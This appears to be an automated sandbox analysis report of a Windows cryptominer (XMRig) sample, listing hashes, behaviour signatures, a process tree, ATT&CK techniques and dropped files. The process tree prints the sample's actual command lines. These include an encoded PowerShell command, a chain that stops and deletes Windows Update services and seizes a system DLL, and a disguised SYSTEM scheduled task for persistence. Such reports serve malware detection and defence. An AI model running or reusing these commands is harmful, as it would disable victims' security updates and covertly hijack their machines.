Analysis

  • max time kernel
    302s
  • max time network
    287s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    03-07-2022 22:15

General

  • Target

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe

  • Size

    7.5MB

  • MD5

    a29f3494661a52e3c66a2908389c5010

  • SHA1

    1645351e4b00a678ad7c4ac7784bf8d9c8703297

  • SHA256

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266

  • SHA512

    1b1314867540a94f60a7075c9021981ede269fda29411eba9b9ed33790010c0f836235c27938eccb5d592cb552d283cdf39ddaf9d28ab3d4d252ba82ada8e25e

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
    "C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1916
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1680
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:628
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1212
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1840
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:1188
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1904
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:560
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1644
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:828
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:768
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:680
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1888
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1896
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1916
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:864
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1396
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:768
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1720
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:1964
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1104
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:756
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:1968
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:1896
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:368
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:788
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:980
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:524
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:816
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1336
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:404
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:1764
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:1644
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:1624
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:1372
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:1764
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:540
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:936
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:936 CREDAT:275457 /prefetch:2
                              4⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:804
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {D0B81A18-6853-4DA8-A026-55D109C4C4A5} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:1584
                        • C:\Program Files\Chrome\updater.exe
                          "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1888
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:836
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                              4⤵
                                PID:1304
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                  5⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1588
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:304
                                  • C:\Windows\system32\sc.exe
                                    sc stop UsoSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1104
                                  • C:\Windows\system32\sc.exe
                                    sc stop WaaSMedicSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1580
                                  • C:\Windows\system32\sc.exe
                                    sc stop wuauserv
                                    5⤵
                                    • Launches sc.exe
                                    PID:368
                                  • C:\Windows\system32\sc.exe
                                    sc stop bits
                                    5⤵
                                    • Launches sc.exe
                                    PID:620
                                  • C:\Windows\system32\sc.exe
                                    sc stop dosvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1996
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:528
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:524
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                    5⤵
                                    • Modifies registry key
                                    PID:2000
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                    5⤵
                                    • Modifies registry key
                                    PID:756
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1984
                                  • C:\Windows\system32\takeown.exe
                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1212
                                  • C:\Windows\system32\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:980
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:996
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1632
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1528
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:368
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                    5⤵
                                      PID:1084
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                      5⤵
                                        PID:1748
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                        5⤵
                                          PID:1764
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                          5⤵
                                            PID:568
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                            5⤵
                                              PID:1588
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                              5⤵
                                                PID:1840
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                5⤵
                                                  PID:404
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                  PID:764
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:976
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:828
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1748
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:864
                                                • C:\Windows\System32\conhost.exe
                                                  C:\Windows\System32\conhost.exe
                                                  4⤵
                                                    PID:1552
                                                    • C:\Windows\System32\conhost.exe
                                                      "C:\Windows\System32\conhost.exe" "adjdyakvdkolri"
                                                      5⤵
                                                        PID:1888
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe zhcixymdmjms1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1692

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              2
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              3
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                60KB

                                                MD5

                                                589c442fc7a0c70dca927115a700d41e

                                                SHA1

                                                66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                                SHA256

                                                2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                                SHA512

                                                1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                340B

                                                MD5

                                                706d41076070a465c24fbc2d4ca858f9

                                                SHA1

                                                e602de1d8d69091a5d2677d97f7dd95c342d397d

                                                SHA256

                                                b50896fcb7c37ff6a263ffb6cc2559caf1cf8bc34fe0f87475036ae625a3ebde

                                                SHA512

                                                79665c85fdee58ce54d0d211771c9baf61af08b001e6547a7867c4776a4b758ed677301049a0ca7c29ee1d7527f57bc08281df98f3b9d423bc703067262de7d8

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\RBYDL40V.txt
                                                Filesize

                                                608B

                                                MD5

                                                d43271896b49f0d8c4dbf173b313fc79

                                                SHA1

                                                7c66a8a073b10c23fd2e00e493ebd6163dd89f02

                                                SHA256

                                                ecb7819dcf152f2ba30cb49c825a02f8522658239be49c9063dfdf7e1653a0c9

                                                SHA512

                                                e325d9abc5bd4fbdbc1df24332a89943f64f03f1a9cc8a752d9272cc1b8b0acffcce232133a61ffcf6d4d3ca31e4884b8eda5d4e5558a29fffc9028f82bac6ec

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

